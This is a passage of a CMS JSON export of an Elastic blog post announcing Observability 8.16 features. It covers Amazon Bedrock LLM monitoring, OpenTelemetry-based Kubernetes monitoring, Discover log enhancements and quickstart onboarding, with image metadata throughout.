apps.","author":["blt29599372767963e8","blt7437d492beac2cb3","blt8319fc21e686bc61","blt5bd19cc24d46cd2f"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-09T04:34:48.291Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1bf2754748d8ca81"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Observability 8.16 announces several key capabilities:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAmazon Bedrock integration for LLM observability \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;adds comprehensive monitoring capabilities for LLM applications built on Amazon Bedrock. This new integration provides out-of-the-box dashboards and detailed insights into model performance, usage patterns, and costs — enabling SREs and developers to effectively monitor and optimize their generative AI (GenAI) applications built on Amazon Bedrock in addition to existing support for applications that use Azure OpenAI.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eUnified Kubernetes observability with Elastic Distributions of OpenTelemetry (EDOT) \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003edelivers automated deployment and configuration of OpenTelemetry collectors through the OpenTelemetry Operator. This streamlined approach includes zero-code instrumentation options and preconfigured dashboards, allowing organizations to quickly gain comprehensive visibility into their Kubernetes environments without manual setup.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEnhanced log analytics and streamlined onboarding \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eintroduce a context-aware Discover experience and new quickstart onboarding workflows. The improved Discover interface automatically adjusts data presentation based on content type, while the new onboarding workflows simplify the setup process for host monitoring, Kubernetes monitoring, and the Amazon Firehose delivery stream.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eE\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003elastic Observability 8.16\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e is\u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration?elektra=whats-new-elastic-7-13-blog\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eavailable now on Elastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e— the only hosted Elasticsearch offering to include all of the new features in this latest release. You can also\u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/downloads/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edownload the Elastic Stack\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e a\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003end our cloud orchestration products — Elastic Cloud Enterprise and Elastic Cloud for Kubernetes — for a self-managed experience.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eWhat else is new in Elastic 8.16? Check out the \u003c/em\u003e\u003c/span\u003e\u003cem\u003e\u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-8-16-0\"\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e8.16 announcement post\u003c/em\u003e\u003c/span\u003e\u003cem\u003e\u003c/em\u003e\u003c/a\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e to learn more \u0026gt;\u0026gt;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Amazon Bedrock integration for LLM observability","_metadata":{"uid":"cs78ca497bb3ffd1a1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs LLM-based applications continue to grow, it's essential for SREs and developers to monitor both the performance and cost of these GenAI applications.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur new Amazon Bedrock integration (technical preview) for Elastic Observability provides comprehensive insights into Amazon Bedrock LLM performance and usage with an out-of-the-box experience that simplifies the collection of Amazon Bedrock metrics and logs, making it easier to gain actionable insights and efficiently manage models. This integration is straightforward to set up and includes prebuilt dashboards. With these capabilities, SREs can now seamlessly monitor, optimize, and troubleshoot LLM applications that use Amazon Bedrock and gain real-time insight into invocation rates, error counts, and latency across different models. The Bedrock integration also adds to the existing abilities to ingest and analyze \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/elastic-opentelemetry-langchain-tracing-langtrace\"\u003e\u003cspan style='font-size: 12pt;'\u003eLangChain tracing data via OpenTelemetry\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to provide comprehensive observability for LLMs and LLM-based applications.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Amazon Bedrock integration offers rich out-of-the-box visibility into the performance and usage information of models in Amazon Bedrock, including text and image models. The Amazon Bedrock overview dashboard below provides a summarized view of the invocations, errors, and latency information across various models.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6f16ce230c2fd21c"}}},{"image":{"image":{"uid":"bltf184117fee974fb9","_version":1,"title":"1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:27:59.798Z","updated_at":"2024-11-11T19:27:59.798Z","content_type":"image/png","file_size":"589408","filename":"1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.484Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf184117fee974fb9/67325abfe5efba2002e075c7/1.png"},"_metadata":{"uid":"csc38423fc236ee442"},"caption_l10n":"","alt_text_l10n":"1","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0d7d8b6814bd298a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe detailed logs view below provides full visibility into raw model interactions, capturing both the inputs (prompts) and the outputs (responses) generated by the models. This transparency enables you to analyze and optimize how your LLM handles different requests, allowing for more precise fine-tuning of both the prompt structure and the resulting model responses. By closely monitoring these interactions, you can refine prompt strategies and enhance the quality and reliability of model outputs.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4c48b61e4b131f1f"}}},{"image":{"image":{"uid":"bltbee88c1bc8752342","_version":1,"title":"2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:28:06.048Z","updated_at":"2024-11-11T19:28:06.048Z","content_type":"image/png","file_size":"431072","filename":"2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.366Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbee88c1bc8752342/67325ac653e3c471fbb3b745/2.png"},"_metadata":{"uid":"cs4833d74edbe1c295"},"caption_l10n":"","alt_text_l10n":"2","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs91fbc0a81f7d6e34"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Amazon Bedrock overview dashboard provides a comprehensive view of the initial and final response times. It includes a percentage comparison graph that highlights the performance differences between these response stages, enabling you to quickly identify efficiency improvements or potential bottlenecks in your LLM interactions.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs16404715fc31f9af"}}},{"image":{"image":{"uid":"bltc2bb206978f1b6d9","_version":1,"title":"3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:28:14.567Z","updated_at":"2024-11-11T19:28:14.567Z","content_type":"image/png","file_size":"318816","filename":"3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.234Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc2bb206978f1b6d9/67325ace06af1f990e5c1344/3.png"},"_metadata":{"uid":"cs25f6c8b93f417510"},"caption_l10n":"","alt_text_l10n":"3","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7a99dd06ee1ce638"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs with any Elastic integration, Amazon Bedrock \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/aws_bedrock#collecting-bedrock-model-invocation-logs-from-s3-bucket\"\u003e\u003cspan style='font-size: 12pt;'\u003elogs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/aws_bedrock#metrics\"\u003e\u003cspan style='font-size: 12pt;'\u003emetrics\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e are fully integrated into Elastic Observability, allowing you to leverage features like SLOs, alerting, custom dashboards, and detailed logs exploration.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"OpenTelemetry (OTel) data ingestion that simply works","_metadata":{"uid":"cseb473e9903b02c44"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Automated Kubernetes infrastructure and application monitoring ","_metadata":{"uid":"cs9abf196abe0e5af1"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe have streamlined Kubernetes monitoring by integrating OpenTelemetry with automated onboarding and preconfigured dashboards. This minimizes manual intervention, allowing organizations to focus on data insights rather than infrastructure management.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe OTel operator-powered orchestration of \u003c/span\u003e\u003ca href=\"https://github.com/elastic/opentelemetry\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eEDOT\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e automates tedious tasks like deploying collectors and also provides a self-serve approach by enabling app teams to use annotations based zero-code instrumentation of applications running in Kubernetes.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4b218c9f63fe0597"}}},{"image":{"image":{"uid":"bltbfa8466827de75d2","_version":1,"title":"4.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:28:28.288Z","updated_at":"2024-11-11T19:28:28.288Z","content_type":"image/png","file_size":"269525","filename":"4.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.444Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbfa8466827de75d2/67325adc853e029ac063f851/4.png"},"_metadata":{"uid":"cs1af52fae05cbb276"},"caption_l10n":"","alt_text_l10n":"4","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"1. Automated OTel Collector lifecycle and application auto-instrumentation with EDOT SDKs","_metadata":{"uid":"cs446438b09e12c43a"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe now use the OpenTelemetry Operator to automate the entire \u003c/span\u003e\u003ca href=\"https://github.com/elastic/opentelemetry/blob/main/docs/collector-components.md\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eEDOT collector\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e lifecycle, from deployment to scaling and updating. With automatic instrumentation via \u003c/span\u003e\u003ca href=\"https://github.com/elastic/opentelemetry/blob/main/README.md#collect-application-data-using-the-edot-language-sdks\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eEDOT SDKs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e that support multiple languages like Node.js, Java, Python, and more, users can focus on applications instead of observability instrumentation.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis three-step flow simplifies the deployment of OpenTelemetry for Kubernetes with Helm. First, users add the OpenTelemetry repository to Helm for streamlined access. Then, the OpenTelemetry Operator is installed with a single command, automating the setup and configuration. Finally, optional instrumentation is made easy by auto-injecting libraries into annotated pods. This process enables fast, hassle-free observability for Kubernetes environments.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs927265752ba5a5c3"}}},{"image":{"image":{"uid":"bltcf9fa9e2644034b7","_version":1,"title":"5.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:41:27.791Z","updated_at":"2024-11-11T19:41:27.791Z","content_type":"image/png","file_size":"343910","filename":"5.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.303Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcf9fa9e2644034b7/67325de7c74149a1c8c309c8/5.png"},"_metadata":{"uid":"cs95d8833a954b4384"},"caption_l10n":"","alt_text_l10n":"5","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"2. Prepackaged OTel Kubernetes","_metadata":{"uid":"cs26b57e28ec9f3c45"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe have bundled all essential OTel components for Kubernetes observability, including receivers and processors. OTel-native Kibana dashboards give you comprehensive observability without manual configuration. By leveraging receivers like the Kubernetes and Kubeletstats Receivers, we now bring you turnkey observability that simplifies the monitoring process across Kubernetes environments.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4e457c06ba6d6402"}}},{"image":{"image":{"uid":"bltf3f16eac789a9619","_version":1,"title":"6.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:41:39.455Z","updated_at":"2024-11-11T19:41:39.455Z","content_type":"image/png","file_size":"403047","filename":"6.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.497Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf3f16eac789a9619/67325df3d1f12c02d81450b7/6.png"},"_metadata":{"uid":"cs7a1dc612261a23af"},"caption_l10n":"","alt_text_l10n":"2. Prepackaged OTel Kubernetes","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"3. Direct tracing to Elasticsearch with EDOT Collector — no schema conversions!","_metadata":{"uid":"csc8377c183b9b563b"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEDOT Collector eliminates the need for an APM server, allowing trace data to flow directly into Elasticsearch via the Elasticsearch exporter. This reduces infrastructure overhead while maintaining rich, real-time performance insights. By consolidating APM functionality into the EDOT ecosystem, Elastic reduces operational complexity and costs — offering a streamlined, scalable observability solution.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse10e8439cc7650b8"}}},{"image":{"image":{"uid":"blt97b21ab27bb709f2","_version":1,"title":"7.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:41:48.167Z","updated_at":"2024-11-11T19:41:48.167Z","content_type":"image/png","file_size":"550791","filename":"7.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.389Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt97b21ab27bb709f2/67325dfc94fe5adfe5b825a3/7.png"},"_metadata":{"uid":"cs2f6d1fd8ab6ba469"},"caption_l10n":"","alt_text_l10n":"3. Direct tracing to Elasticsearch with EDOT Collector — no schema conversions!","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs98a09ede1a4b97e4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis approach ensures we fully preserve OpenTelemetry’s semantic conventions and data structure, including resource attributes, for consistent and reliable observability.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Log analytics enhancements","_metadata":{"uid":"cs9d9a4fdc8970017a"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Contextual Discover experience","_metadata":{"uid":"cs3e47ceb2235ff6f4"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDiscover in Kibana 8.16 now automatically adjusts data table presentation based on the type of data being explored. This streamlined, context-aware approach boosts productivity by simplifying data exploration and highlighting key log insights without the need for additional configuration. This is just the start of our ongoing effort to make Discover the go-to place for log analysis.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6821b3a341e1a728"}}},{"image":{"image":{"uid":"blte8b911dbae92fccc","_version":1,"title":"8.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:41:54.573Z","updated_at":"2024-11-11T19:41:54.573Z","content_type":"image/png","file_size":"512889","filename":"8.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.252Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte8b911dbae92fccc/67325e0286ddd2190024ce76/8.png"},"_metadata":{"uid":"csf1762c4aca520d26"},"caption_l10n":"","alt_text_l10n":"Contextual Discover experience","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7ed2d15874658da1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe new summary column allows you to view important information at a glance. Service names are highlighted and important resource fields are displayed by default, followed by the log message, error, or stacktrace.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSimilar improvements are also present for select fields, such as “log.level” and “service.name” when adding them individually as a dedicated column. The log level is highlighted based on the severity, and the service name also has the richer display state and offers direct links to the APM UI.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd7bdd2c68a861a26"}}},{"image":{"image":{"uid":"blt5ec30b53aeba710a","_version":1,"title":"9.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:42:01.892Z","updated_at":"2024-11-11T19:42:01.892Z","content_type":"image/png","file_size":"410359","filename":"9.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.457Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5ec30b53aeba710a/67325e09188be3a12df073a4/9.png"},"_metadata":{"uid":"csc6d004f2e7152e46"},"caption_l10n":"","alt_text_l10n":"Contextual Discover experience-2","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Data Set Quality page with more detail information","_metadata":{"uid":"cs2e11891820700048"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe Data Set Quality page has been extended with additional details to address common issues that result in _ignored fields. The UI now gives users additional details around the data quality issues.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csefa68039842d25d0"}}},{"image":{"image":{"uid":"blt02a6c2f99d1cc816","_version":1,"title":"blog-elastic-log-level-field-ignored.png","created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-11-13T15:06:44.415Z","updated_at":"2024-11-13T15:06:44.415Z","content_type":"image/png","file_size":"196208","filename":"blog-elastic-log-level-field-ignored.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-13T15:07:01.264Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt02a6c2f99d1cc816/6734c084ee4d419e233986dd/blog-elastic-log-level-field-ignored.png"},"_metadata":{"uid":"cs0e15dfad4d939346"},"caption_l10n":"","alt_text_l10n":"Data Set Quality page with more detail information","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Streamlined onboarding and host monitoring","_metadata":{"uid":"cs454c7bcf93b863e3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe're moving our hosts feature to general availability, helping you detect and resolve problems with your hosts more effectively. Key improvements include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eViewing hosts and their metrics detected by APM (even if you aren't explicitly observing them)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnboarding your hosts easily\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGaining consistent metrics for your hosts in Observability, such as hosts, infrastructure inventory, dashboards\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Quickstart onboarding workflows","_metadata":{"uid":"cs5b0fc7542feb77a7"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe're introducing three new quickstart onboarding workflows in the Add Data page to streamline the setup or telemetry data ingestion process — host monitoring, Kubernetes monitoring, and Amazon Data Firehouse (technical preview).\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eHost monitoring:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Scans for logs and metrics on the host and auto-installs the following integrations: System, Custom, Apache, Docker, Nginx, Redis, MySQL, RabbitMQ, Kafka, MongoDB, Apache Tomcat, Prometheus, and Haproxy. When a user follows this quickstart-guided workflow for host monitoring (Linux and macOS), they will obtain a configuration file for the standalone Elastic Agent with predefined defaults for the detected integrations. Users can tweak the provided configuration file based on their needs and use their existing infrastructure-as-code tooling for the Agent lifecycle management in their production environment.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csaa2fb20f9d6fd81b"}}},{"image":{"image":{"uid":"bltfda240b5cffc86fc","_version":1,"title":"11.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:42:18.095Z","updated_at":"2024-11-11T19:42:18.095Z","content_type":"image/png","file_size":"39989","filename":"11.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.540Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfda240b5cffc86fc/67325e1a4d178ec56413afce/11.png"},"_metadata":{"uid":"csab924b38902df10b"},"caption_l10n":"","alt_text_l10n":"Quickstart onboarding workflows","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csfa74d0e9c5bfb451"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt the end of this guided workflow, users are provided a link to the appropriate prebuilt dashboard for each integration so that they can explore their data.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf1e958f0c36434a7"}}},{"image":{"image":{"uid":"blt6dd752f81e1b2037","_version":1,"title":"12.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:42:28.191Z","updated_at":"2024-11-11T19:42:28.191Z","content_type":"image/png","file_size":"261337","filename":"12.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.408Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6dd752f81e1b2037/67325e24adf8c53606fbf396/12.png"},"_metadata":{"uid":"cs61c6287526fe9a31"},"caption_l10n":"","alt_text_l10n":"auto-detect logs and metrics","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csba8214ca418ce01b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKubernetes monitoring:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Sets up monitoring of the Kubernetes cluster and the container workloads using the standalone Elastic Agent. When a user follows this quickstart-guided workflow for Kubernetes monitoring from the Add Data page, they will obtain a Kubernetes manifest file with predefined defaults for logs and metrics collection. The System and Kubernetes integrations are also automatically installed in Kibana. Users can tweak the provided manifest file based on their needs and use their existing infrastructure-as-code tooling for the Agent lifecycle management in their production environment.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs03906609351fe5e4"}}},{"image":{"image":{"uid":"blt424ec1e8d4d0251a","_version":1,"title":"13.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:42:47.014Z","updated_at":"2024-11-11T19:42:47.014Z","content_type":"image/png","file_size":"39522","filename":"13.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.270Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt424ec1e8d4d0251a/67325e3706af1f1bb95c1360/13.png"},"_metadata":{"uid":"csf24add0c7fa90084"},"caption_l10n":"","alt_text_l10n":"Kubernetes monitoring:","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd9795813ec8effea"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt the end of this guided workflow, users are provided a link to the Kubernetes cluster overview dashboard so that they can explore the metrics and logs that have just been ingested.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs21c1034241c973f0"}}},{"image":{"image":{"uid":"blt2b8aeed37df93d53","_version":1,"title":"14.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:42:55.158Z","updated_at":"2024-11-11T19:42:55.158Z","content_type":"image/png","file_size":"375315","filename":"14.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.471Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2b8aeed37df93d53/67325e3fa5c7fcbbef0c92a1/14.png"},"_metadata":{"uid":"cs3ee7bb75197b3431"},"caption_l10n":"","alt_text_l10n":"monitor your k8 cluster with standalone elastic agent","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0504998a3be17e26"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAmazon Data Firehose (technical 